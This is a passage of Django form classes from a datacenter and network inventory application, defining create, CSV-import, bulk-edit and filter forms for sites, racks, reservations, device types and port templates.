            'latitude': "Latitude in decimal format (xx.yyyyyy)",
            'longitude': "Longitude in decimal format (xx.yyyyyy)"
        }
class SiteCSVForm(CustomFieldModelCSVForm):
    """CSV bulk-import form for Site objects; related objects are referenced by name."""
    status = CSVChoiceField(
        choices=SiteStatusChoices,
        required=False,
        help_text='Operational status'
    )
    region = CSVModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned region'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    class Meta:
        model = Site
        fields = Site.csv_headers
        help_texts = {
            'time_zone': mark_safe(
                'Time zone (<a href="https://en.wikipedia.org/wiki/List_of_tz_database_time_zones">available options</a>)'
            )
        }
class SiteBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for Site objects; 'pk' carries the selected objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Site.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(SiteStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    asn = forms.IntegerField(
        min_value=BGP_ASN_MIN,
        max_value=BGP_ASN_MAX,
        required=False,
        label='ASN'
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    time_zone = TimeZoneFormField(
        choices=add_blank_choice(TimeZoneFormField().choices),
        required=False,
        widget=StaticSelect2()
    )
    class Meta:
        # Fields which may be set to empty via the bulk edit "set null" option
        nullable_fields = [
            'region', 'tenant', 'asn', 'description', 'time_zone',
        ]
class SiteFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
    """Filter form for the site list view."""
    model = Site
    field_order = ['q', 'status', 'region', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    status = forms.MultipleChoiceField(
        choices=SiteStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    tag = TagFilterField(model)
#
# Rack groups
#
class RackGroupForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for RackGroup objects with cascading region -> site -> parent selection."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    parent = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    slug = SlugField()
    class Meta:
        model = RackGroup
        fields = (
            'region', 'site', 'parent', 'name', 'slug', 'description',
        )
class RackGroupCSVForm(CSVModelForm):
    """CSV bulk-import form for RackGroup objects; site and parent are referenced by name."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    parent = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Parent rack group',
        error_messages={
            'invalid_choice': 'Rack group not found.',
        }
    )
    class Meta:
        model = RackGroup
        fields = RackGroup.csv_headers
class RackGroupFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the rack group list view (region/site/parent scoping)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    parent = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region',
            'site': '$site',
        }
    )
#
# Rack roles
#
class RackRoleForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for RackRole objects."""
    slug = SlugField()
    class Meta:
        model = RackRole
        fields = [
            'name', 'slug', 'color', 'description',
        ]
class RackRoleCSVForm(CSVModelForm):
    """CSV bulk-import form for RackRole objects."""
    slug = SlugField()
    class Meta:
        model = RackRole
        fields = RackRole.csv_headers
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }
#
# Racks
#
class RackForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """Create/edit form for Rack objects with cascading region -> site -> group selection."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    role = DynamicModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Rack
        fields = [
            'region', 'site', 'group', 'name', 'facility_id', 'tenant_group', 'tenant', 'status', 'role', 'serial',
            'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
            'comments', 'tags',
        ]
        help_texts = {
            'site': "The site at which the rack exists",
            'name': "Organizational rack name",
            'facility_id': "The unique rack ID assigned by the facility",
            'u_height': "Height in rack units",
        }
        widgets = {
            'status': StaticSelect2(),
            'type': StaticSelect2(),
            'width': StaticSelect2(),
            'outer_unit': StaticSelect2(),
        }
class RackCSVForm(CustomFieldModelCSVForm):
    """CSV bulk-import form for Rack objects; related objects are referenced by name."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name'
    )
    group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of assigned tenant'
    )
    status = CSVChoiceField(
        choices=RackStatusChoices,
        required=False,
        help_text='Operational status'
    )
    role = CSVModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Name of assigned role'
    )
    type = CSVChoiceField(
        choices=RackTypeChoices,
        required=False,
        help_text='Rack type'
    )
    width = forms.ChoiceField(
        choices=RackWidthChoices,
        help_text='Rail-to-rail width (in inches)'
    )
    outer_unit = CSVChoiceField(
        choices=RackDimensionUnitChoices,
        required=False,
        help_text='Unit for outer dimensions'
    )
    class Meta:
        model = Rack
        fields = Rack.csv_headers
    def __init__(self, data=None, *args, **kwargs):
        """Narrow the 'group' queryset to the site named in the submitted row."""
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit group queryset by assigned site
            # BUGFIX: use single quotes inside the f-string; reusing the enclosing
            # double quote is a SyntaxError before Python 3.12
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['group'].queryset = self.fields['group'].queryset.filter(**params)
class RackBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for Rack objects; 'pk' carries the selected objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(RackStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    role = DynamicModelChoiceField(
        queryset=RackRole.objects.all(),
        required=False
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
        label='Serial Number'
    )
    asset_tag = forms.CharField(
        max_length=50,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(RackTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    width = forms.ChoiceField(
        choices=add_blank_choice(RackWidthChoices),
        required=False,
        widget=StaticSelect2()
    )
    u_height = forms.IntegerField(
        required=False,
        label='Height (U)'
    )
    desc_units = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Descending units'
    )
    outer_width = forms.IntegerField(
        required=False,
        min_value=1
    )
    outer_depth = forms.IntegerField(
        required=False,
        min_value=1
    )
    outer_unit = forms.ChoiceField(
        choices=add_blank_choice(RackDimensionUnitChoices),
        required=False,
        widget=StaticSelect2()
    )
    comments = CommentField(
        widget=SmallTextarea,
        label='Comments'
    )
    class Meta:
        # Fields which may be set to empty via the bulk edit "set null" option
        nullable_fields = [
            'group', 'tenant', 'role', 'serial', 'asset_tag', 'outer_width', 'outer_depth', 'outer_unit', 'comments',
        ]
class RackFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
    """Filter form for the rack list view."""
    model = Rack
    field_order = ['q', 'region', 'site', 'group_id', 'status', 'role', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    status = forms.MultipleChoiceField(
        choices=RackStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    type = forms.MultipleChoiceField(
        choices=RackTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    width = forms.MultipleChoiceField(
        choices=RackWidthChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    role = DynamicModelMultipleChoiceField(
        queryset=RackRole.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    tag = TagFilterField(model)
#
# Rack elevations
#
class RackElevationFilterForm(RackFilterForm):
    """
    Filter form for the rack elevations view. Extends RackFilterForm with an
    explicit rack (id) selector chained to the site/group filters.
    """
    field_order = ['q', 'region', 'site', 'group_id', 'id', 'status', 'role', 'tenant_group', 'tenant']
    id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        label='Rack',
        required=False,
        display_field='display_name',
        query_params={
            'site': '$site',
            'group_id': '$group_id',
        }
    )
#
# Rack reservations
#
class RackReservationForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """
    Create/edit form for RackReservation objects. Region, site, and rack group
    act as chained selectors narrowing the rack choices; they are not saved on
    the reservation itself.
    """
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'group_id': '$rack_group',
        }
    )
    units = NumericArrayField(
        base_field=forms.IntegerField(),
        help_text="Comma-separated list of numeric unit IDs. A range may be specified using a hyphen."
    )
    user = forms.ModelChoiceField(
        queryset=User.objects.order_by(
            'username'
        ),
        widget=StaticSelect2()
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = RackReservation
        fields = [
            'rack', 'units', 'user', 'tenant_group', 'tenant', 'description', 'tags',
        ]
class RackReservationCSVForm(CustomFieldModelCSVForm):
    """
    CSV bulk-import form for RackReservation objects. When bound, the
    rack_group and rack querysets are narrowed to the site/group named in the
    submitted data so that name-based lookups are unambiguous.
    """
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Parent site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        help_text='Rack'
    )
    units = SimpleArrayField(
        base_field=forms.IntegerField(),
        required=True,
        help_text='Comma-separated list of individual unit numbers'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    class Meta:
        model = RackReservation
        fields = ('site', 'rack_group', 'rack', 'units', 'tenant', 'description')
    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)
        if data:
            # Limit rack_group queryset by assigned site.
            # Fix: use single quotes for the subscript inside the f-string; reusing the
            # outer double quotes is a SyntaxError on Python < 3.12 (PEP 701).
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
            # Limit rack queryset by assigned site and group
            params = {
                f"site__{self.fields['site'].to_field_name}": data.get('site'),
                f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
            }
            self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class RackReservationBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """
    Bulk-edit form for RackReservation objects. Blank fields are left unchanged
    on the selected objects; no fields may be nulled (nullable_fields is empty).
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=RackReservation.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    user = forms.ModelChoiceField(
        queryset=User.objects.order_by(
            'username'
        ),
        required=False,
        widget=StaticSelect2()
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    class Meta:
        nullable_fields = []
class RackReservationFilterForm(BootstrapMixin, TenancyFilterForm):
    """
    Filter form for the RackReservation list view.
    """
    model = RackReservation
    field_order = ['q', 'region', 'site', 'group_id', 'user_id', 'tenant_group', 'tenant']
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.prefetch_related('site'),
        required=False,
        label='Rack group',
        null_option='None'
    )
    user_id = DynamicModelMultipleChoiceField(
        queryset=User.objects.all(),
        required=False,
        display_field='username',
        label='User',
        widget=APISelectMultiple(
            api_url='/api/users/users/',
        )
    )
    tag = TagFilterField(model)
#
# Manufacturers
#
class ManufacturerForm(BootstrapMixin, forms.ModelForm):
    """
    Create/edit form for Manufacturer objects. The slug is auto-populated from
    the name by the SlugField widget.
    """
    slug = SlugField()
    class Meta:
        model = Manufacturer
        fields = [
            'name', 'slug', 'description',
        ]
class ManufacturerCSVForm(CSVModelForm):
    """
    CSV bulk-import form for Manufacturer objects. Columns mirror the model's
    csv_headers definition.
    """
    class Meta:
        model = Manufacturer
        fields = Manufacturer.csv_headers
#
# Device types
#
class DeviceTypeForm(BootstrapMixin, CustomFieldModelForm):
    """
    Create/edit form for DeviceType objects.
    """
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all()
    )
    slug = SlugField(
        slug_source='model'
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = DeviceType
        fields = [
            'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
            'front_image', 'rear_image', 'comments', 'tags',
        ]
        widgets = {
            'subdevice_role': StaticSelect2(),
            # Exclude SVG images (unsupported by PIL)
            'front_image': forms.FileInput(attrs={
                'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
            }),
            'rear_image': forms.FileInput(attrs={
                'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
            })
        }
class DeviceTypeImportForm(BootstrapMixin, forms.ModelForm):
    """
    Form for importing DeviceType definitions (e.g. from the device-type
    library). The manufacturer is resolved by name rather than PK.
    """
    manufacturer = forms.ModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name'
    )
    class Meta:
        model = DeviceType
        fields = [
            'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
            'comments',
        ]
class DeviceTypeBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """
    Bulk-edit form for DeviceType objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceType.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    u_height = forms.IntegerField(
        min_value=1,
        required=False
    )
    is_full_depth = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect(),
        label='Is full depth'
    )
    class Meta:
        nullable_fields = []
class DeviceTypeFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """
    Filter form for the DeviceType list view. The *_ports/interfaces booleans
    filter on whether a device type defines any templates of that kind.
    """
    model = DeviceType
    q = forms.CharField(
        required=False,
        label='Search'
    )
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False
    )
    subdevice_role = forms.MultipleChoiceField(
        choices=add_blank_choice(SubdeviceRoleChoices),
        required=False,
        widget=StaticSelect2Multiple()
    )
    console_ports = forms.NullBooleanField(
        required=False,
        label='Has console ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    console_server_ports = forms.NullBooleanField(
        required=False,
        label='Has console server ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_ports = forms.NullBooleanField(
        required=False,
        label='Has power ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_outlets = forms.NullBooleanField(
        required=False,
        label='Has power outlets',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    interfaces = forms.NullBooleanField(
        required=False,
        label='Has interfaces',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    pass_through_ports = forms.NullBooleanField(
        required=False,
        label='Has pass-through ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Device component templates
#
class ComponentTemplateCreateForm(ComponentForm):
    """
    Base form for the creation of device component templates (subclassed from ComponentTemplateModel).

    The manufacturer field is a convenience selector used only to narrow the
    device_type choices; it is not saved on the template itself.
    """
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        initial_params={
            'device_types': 'device_type'
        }
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    description = forms.CharField(
        required=False
    )
class ConsolePortTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single ConsolePortTemplate. The parent device_type is fixed
    and rendered as a hidden input.
    """
    class Meta:
        model = ConsolePortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class ConsolePortTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for ConsolePortTemplate objects (name_pattern may expand
    to multiple ports).
    """
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        widget=StaticSelect2()
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsolePortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for ConsolePortTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsolePortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    # Fix: 'description' was listed in Meta.nullable_fields but no such form field
    # existed, so it could never be edited or nulled. Added to match the sibling
    # ConsoleServerPortTemplateBulkEditForm.
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'description')
class ConsoleServerPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single ConsoleServerPortTemplate. The parent device_type is
    fixed and rendered as a hidden input.
    """
    class Meta:
        model = ConsoleServerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class ConsoleServerPortTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for ConsoleServerPortTemplate objects. Server ports share
    the same connector type set as console ports (ConsolePortTypeChoices).
    """
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        widget=StaticSelect2()
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsoleServerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for ConsoleServerPortTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsoleServerPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'description')
class PowerPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single PowerPortTemplate. The parent device_type is fixed
    and rendered as a hidden input.
    """
    class Meta:
        model = PowerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class PowerPortTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for PowerPortTemplate objects.
    """
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum power draw (watts)"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated power draw (watts)"
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw',
        'description',
    )
class PowerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for PowerPortTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum power draw (watts)"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated power draw (watts)"
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'maximum_draw', 'allocated_draw', 'description')
class PowerOutletTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single PowerOutletTemplate. The parent device_type is fixed
    and rendered as a hidden input; the power_port choices are restricted to
    ports defined on the same DeviceType.
    """
    class Meta:
        model = PowerOutletTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Restrict power_port choices to ports belonging to this template's DeviceType
        if hasattr(self.instance, 'device_type'):
            port_queryset = PowerPortTemplate.objects.filter(device_type=self.instance.device_type)
            self.fields['power_port'].queryset = port_queryset
class PowerOutletTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for PowerOutletTemplate objects. power_port choices are
    limited to templates belonging to the parent DeviceType.
    """
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg',
        'description',
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit power_port choices to current DeviceType
        # NOTE(review): raises DeviceType.DoesNotExist if neither initial nor submitted
        # data carries a device_type PK — assumed to always be present; confirm callers.
        device_type = DeviceType.objects.get(
            pk=self.initial.get('device_type') or self.data.get('device_type')
        )
        self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
            device_type=device_type
        )
class PowerOutletTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for PowerOutletTemplate objects. The (hidden, disabled)
    device_type carried in initial data scopes the power_port choices.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerOutletTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device_type = forms.ModelChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'type', 'power_port', 'feed_leg', 'description')
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit power_port queryset to PowerPortTemplates which belong to the parent DeviceType
        if 'device_type' in self.initial:
            device_type = DeviceType.objects.filter(pk=self.initial['device_type']).first()
            self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(device_type=device_type)
        else:
            # No parent DeviceType known: disable power_port selection entirely
            self.fields['power_port'].choices = ()
            self.fields['power_port'].widget.attrs['disabled'] = True
class InterfaceTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single InterfaceTemplate. The parent device_type is fixed
    and rendered as a hidden input.
    """
    class Meta:
        model = InterfaceTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'mgmt_only', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class InterfaceTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for InterfaceTemplate objects.
    """
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices,
        widget=StaticSelect2()
    )
    mgmt_only = forms.BooleanField(
        required=False,
        label='Management only'
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'mgmt_only', 'description')
class InterfaceTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """
    Bulk-edit form for InterfaceTemplate objects.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=InterfaceTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(InterfaceTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    mgmt_only = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Management only'
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'description')
class FrontPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """
    Edit form for a single FrontPortTemplate. The parent device_type is fixed
    and rendered as a hidden input; rear_port choices are restricted to rear
    ports defined on the same DeviceType.
    """
    class Meta:
        model = FrontPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'rear_port': StaticSelect2(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Restrict rear_port choices to rear ports on this template's DeviceType
        if hasattr(self.instance, 'device_type'):
            rear_port_queryset = RearPortTemplate.objects.filter(device_type=self.instance.device_type)
            self.fields['rear_port'].queryset = rear_port_queryset
class FrontPortTemplateCreateForm(ComponentTemplateCreateForm):
    """
    Bulk-creation form for FrontPortTemplate objects. Each created front port
    must be mapped to a distinct, unoccupied (rear port, position) pair; the
    available pairs are computed in __init__ and validated in clean().
    """
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2()
    )
    rear_port_set = forms.MultipleChoiceField(
        choices=[],
        label='Rear ports',
        help_text='Select one rear port assignment for each front port being created.',
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description',
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
